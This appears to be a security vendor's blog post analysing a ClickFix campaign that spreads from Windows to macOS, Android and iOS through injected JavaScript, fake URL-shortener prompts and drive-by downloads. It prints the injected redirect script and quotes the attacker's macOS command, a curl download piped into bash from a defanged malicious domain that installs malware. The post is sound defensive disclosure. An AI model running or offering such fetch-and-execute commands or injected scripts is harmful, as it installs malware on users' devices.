What began as a Windows-focused social engineering trick has turned into a multi-platform client-side threat. In this article, we break down a recent ClickFix variant that now targets macOS, Android, and iOS, using browser-based redirections, fake UI prompts, and even drive-by download techniques.
What is a ClickFix attack?
ClickFix attacks aren’t new. My first encounter with one was in September 2024:
A ClickFix attack is a form of targeted social engineering or client-side attack that exploits a user’s instinct to “just fix the issue.” It typically starts with a convincing message that points to a supposed problem (like a security vulnerability or repo issue). The user is urged to click a link or run a command, believing they're resolving something important.
In this attack example, the user is requested to run a script in the terminal. On Windows, that meant PowerShell. Naturally, the same technique works on macOS and Linux too. And just like with Windows, I assumed users wouldn’t fall for it.
Assumptions however, are a dangerous game in cyber security, which was unfortunately proven once again.
We are c/side, and we monitor client-side, third-party JavaScript attacks. In the past three months alone, we've observed over 300K compromised websites.
Interestingly, this is the second time we’re breaking the news of attackers evolving their TTPs (Tactics, Techniques, and Procedures).
But what was once a Windows-only threat, is now targeting other operating systems as well.
The attack in detail
We received an alert for JavaScript downloaded from:
hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16The delivered script:
(function () { var sitename = document.querySelector("meta[property='og:url']").getAttribute("content"); const mysite = new URL(sitename);const mysitename = `${mysite.protocol}//${mysite.hostname}`;var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content"); var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-'); var xtitle_spa = xtitle_spe.replace(/\s+/g, '-'); var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16'; var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);var final_url_2 = final_url_1.replace('{site}', mysitename); var id = 16; var successResponse = final_url_2; var elements = document.getElementsByClassName("buttonPress-"+16); for(var i = 0; i < elements.length; i++) {var anchor = elements[i];anchor.onclick = function() {window.open(successResponse, '_blank');}} })();
This JavaScript is not highly obfuscated, which is uncommon on these kinds of attacks. It creates a click handler for elements with a specific class name that opens a URL in a new tab when clicked. Here's what it does:
- Takes a template URL (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
- Replaces {KEYWORD} with the processed page title
- Attaches click handlers to all elements with the class buttonPress-16
- When clicked, these elements open the constructed URL in a new tab
Below is the redirection chain :
Redirection Chain on UI
The page appears like a URL shortener and asks the user to copy a link. The attackers are abusing cutt[.]ly, a legitimate URL shortener.
When a user pastes the shortened URL into the browser, it redirects them to:
This mimicked URL shortener page brings the following pop-up:
“Paste the link you copied into the address line of the browser.”
It then redirects to user to a download page (in this case for macOS):
/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"
The content of this shell file as follows in this screenshot:
This shell script then downloads a macOS executable (detected by 10 antivirus engines on VirusTotal).
Android and iOS Behavior
When we tested this on Android and iOS, we expected a ClickFix variant. But instead, we encountered a drive-by attack.
A drive-by attack is a type of cyberattack where malicious code is executed or downloaded onto a device simply by visiting a compromised or malicious webpage. No clicks, installs, or interaction required.
The page now redirected us to:
hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
This site downloaded a .tar file - 7zip protected with a password - that extracted and dropped the malware (detected by 5 AV engines). And detected by 5 vendors on VirusTotal.
Detected by 5 vendors on VirusTotal.
Both on Android and Windows OS, this drive-by attack style was used.
This is a fascinating and evolving attack that demonstrates how attackers are expanding their reach. What started as a Windows-specific ClickFix campaign is now targeting macOS, Android, and iOS. Significantly expanding the scale of the operation.
It’s yet another reminder of how client-side attacks are vastly spreading, and the various forms it can take. All by exploiting the trust users place in browser interactions.